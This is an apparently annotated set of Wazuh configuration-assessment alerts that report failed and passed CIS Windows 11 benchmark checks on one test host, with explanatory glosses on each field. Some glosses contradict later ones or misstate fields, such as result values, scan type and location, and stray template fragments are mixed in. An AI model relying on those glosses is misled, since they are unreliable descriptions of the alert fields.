data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.10.1.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.5'] CIS Critical Security Controls (CIS CSC) mapping – the safeguard‑level view of the benchmark item.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2497736 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26285 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether enhanced anti-spoofing is configured for devices which support it. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Enterprise managed environments are now supporting a wider range of mobile devices, increasing the security on these devices will help protect against unauthorized access on your network. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Biometrics\Facial Features\Configure enhanced anti-spoofing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Biometrics.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Note #2: In the Windows 10 Release 1511 and Windows 10 Release 1607 & Server 2016 Administrative Templates, this setting was initially named Use enhanced anti-spoofing when available. It was renamed to Configure enhanced anti-spoofing starting with the Windows 10 Release 1703 Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.10.1.1 CIS benchmark control number this check implements – should match rule.cis on the same alert.
data.sca.check.compliance.cis_csc: 10.5 CIS Critical Security Controls (CIS CSC) safeguard the check maps to.
data.sca.check.compliance.pci_dss: 8.1 PCI DSS requirement the check supports – pairs with rule.pci_dss.
data.sca.check.compliance.tsc: CC6.1 AICPA Trust Services Criteria (SOC 2) control the check maps to.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Biometrics\\FacialFeatures'] Registry key(s) the check reads to decide pass/fail – the place to verify a fix by hand.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.12.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2501545 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26286 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow Use of Camera' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether the use of Camera devices on the machine are permitted. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Cameras in a high security environment can pose serious privacy and data exfiltration risks - they should be disabled to help mitigate that risk. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Camera\Allow Use of Camera. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Camera.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.12.1 CIS benchmark control number this check implements – should match rule.cis on the same alert.
data.sca.check.compliance.pci_dss: 2.2.5 PCI DSS requirement the check supports – pairs with rule.pci_dss.
data.sca.check.compliance.tsc: CC6.3 AICPA Trust Services Criteria (SOC 2) control the check maps to.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Camera'] Registry key(s) the check reads to decide pass/fail – the place to verify a fix by hand.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.14.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2504389 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26288 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off cloud optimized content' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting turns off cloud optimized content in all Windows experiences. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Due to privacy concerns, data should never be sent to any 3rd party since this data could contain sensitive information. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud optimized content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 20H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.14.2 CIS benchmark control number this check implements – should match rule.cis on the same alert.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent'] Registry key(s) the check reads to decide pass/fail – the place to verify a fix by hand.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.14.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2507226 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26287 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether cloud consumer account state content is allowed in all Windows experiences. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The use of consumer accounts in an enterprise managed environment is not good security practice as it could lead to possible data leakage. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud consumer account state content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.14.1 CIS benchmark recommendation number – the section of the benchmark to open for the full audit procedure and remediation detail.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent'] Registry key the check reads. The value name and expected data sit in the SCA policy file, not in the alert; a key that is absent (the remediation warns this path may not exist by default) fails the check just as a wrong value does.
data.sca.check.result: failed passed, failed or not applicable. failed = the host deviates from the benchmark. The rule id follows the result (19007 for failed checks, 19008 for passed ones), so count findings on this field rather than on rule.id.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2510242 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check (one benchmark check's result, as here) or summary (totals for the whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26289 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting turns off experiences that help consumers make the most of their devices and Microsoft account. The recommended state for this setting is: Enabled. Note: Per Microsoft TechNet, this policy setting only applies to Windows 10 Enterprise and Windows 10 Education editions. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Having apps silently install in an enterprise managed environment is not good security practice - especially if the apps send data back to a 3rd party. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off Microsoft consumer experiences. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.14.3 CIS benchmark recommendation number – open this section of the benchmark for the audit and remediation detail.
data.sca.check.compliance.pci_dss: 4.1 PCI DSS v3.2.1 requirement the check supports (4.1: protect cardholder data in transit over open, public networks).
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule technical safeguards mapped (45 CFR §164.312): encryption and decryption (a)(2)(iv) and transmission security (e).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control mapped: SC-8, Transmission Confidentiality and Integrity.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 SOC 2 Trust Services Criteria mapped: CC6 (logical access controls) and CC7 (system operations and monitoring).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent'] Registry key the check reads; the value name and expected data come from the SCA policy file. A missing key fails the check.
data.sca.check.result: failed passed, failed or not applicable. failed = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2513822 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check (one benchmark check's result, as here) or summary (totals for the whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26290 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether or not a PIN is required for pairing to a wireless display device. The recommended state for this setting is: Enabled: First Time OR Enabled: Always. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If this setting is not configured or disabled then a PIN would not be required when pairing wireless display devices to the system, increasing the risk of unauthorized use. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: First Time OR Enabled: Always: Computer Configuration\Policies\Administrative Templates\Windows Components\Connect\Require pin for pairing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WirelessDisplay.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). The new Choose one of the following actions sub-option was later added as of the Windows 10 Release 1809 Administrative Templates. Choosing Enabled in the older templates is the equivalent of choosing Enabled: First Time in the newer templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.15.1 CIS benchmark recommendation number – open this section of the benchmark for the audit and remediation detail.
data.sca.check.compliance.pci_dss: 4.1 PCI DSS v3.2.1 requirement the check supports (4.1: protect cardholder data in transit over open, public networks).
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule technical safeguards mapped (45 CFR §164.312): encryption and decryption (a)(2)(iv) and transmission security (e).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control mapped: SC-8, Transmission Confidentiality and Integrity.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 SOC 2 Trust Services Criteria mapped: CC6 (logical access controls) and CC7 (system operations and monitoring).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Connect'] Registry key the check reads; the value name and expected data come from the SCA policy file. A missing key fails the check.
data.sca.check.result: failed passed, failed or not applicable. failed = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.16.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2517794 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check (one benchmark check's result, as here) or summary (totals for the whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26291 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not display the password reveal button' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure the display of the password reveal button in password entry user experiences. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: This is a useful feature when entering a long and complex password, especially when using a touchscreen. The potential risk is that someone else may see your password while surreptitiously observing your screen. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Do not display the password reveal button. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.16.1 CIS benchmark recommendation number – open this section of the benchmark for the audit and remediation detail.
data.sca.check.compliance.pci_dss: 8.2.1 PCI DSS v3.2.1 requirement the check supports (8.2.1: keep authentication credentials unreadable in storage and transit).
data.sca.check.compliance.tsc: CC6.1 SOC 2 Trust Services Criteria mapped: CC6.1, logical access security.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredUI'] Registry key the check reads; the value name and expected data come from the SCA policy file. A missing key fails the check.
data.sca.check.result: failed passed, failed or not applicable. failed = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.16.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2521028 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check (one benchmark check's result, as here) or summary (totals for the whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26292 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Users could see the list of administrator accounts, making it slightly easier for a malicious user who has logged onto a console session to try to crack the passwords of those accounts. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Enumerate administrator accounts on elevation. Note: This Group Policy path is provided by the Group Policy template CredUI.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.16.2 CIS benchmark recommendation number – open this section of the benchmark for the audit and remediation detail.
data.sca.check.compliance.pci_dss: 8.2.1 PCI DSS v3.2.1 requirement the check supports (8.2.1: keep authentication credentials unreadable in storage and transit).
data.sca.check.compliance.tsc: CC6.1 SOC 2 Trust Services Criteria mapped: CC6.1, logical access security.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\CredUI'] Registry key the check reads. Note this one lives under SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, not SOFTWARE\Policies like its neighbours – check the exact path before you verify by hand.
data.sca.check.result: passed passed, failed or not applicable. passed = this host already meets the recommendation. The rule id moved to 19008 for this event while the failed checks around it fire 19007, so filter on this field, not on rule.id, when counting open findings.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.16.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2524241 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check (one benchmark check's result, as here) or summary (totals for the whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26293 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether security questions can be used to reset local account passwords. The security question feature does not apply to domain accounts, only local accounts on the workstation. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Users could establish security questions that are easily guessed or sleuthed by observing the user’s social media accounts, making it easier for a malicious actor to change the local user account password and gain access to the computer as that user account. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Prevent the use of security questions for local accounts. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 10 Release 1903 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.16.3 CIS benchmark recommendation number – open this section of the benchmark for the audit and remediation detail.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] Registry key the check reads; the value name and expected data come from the SCA policy file. A missing key fails the check.
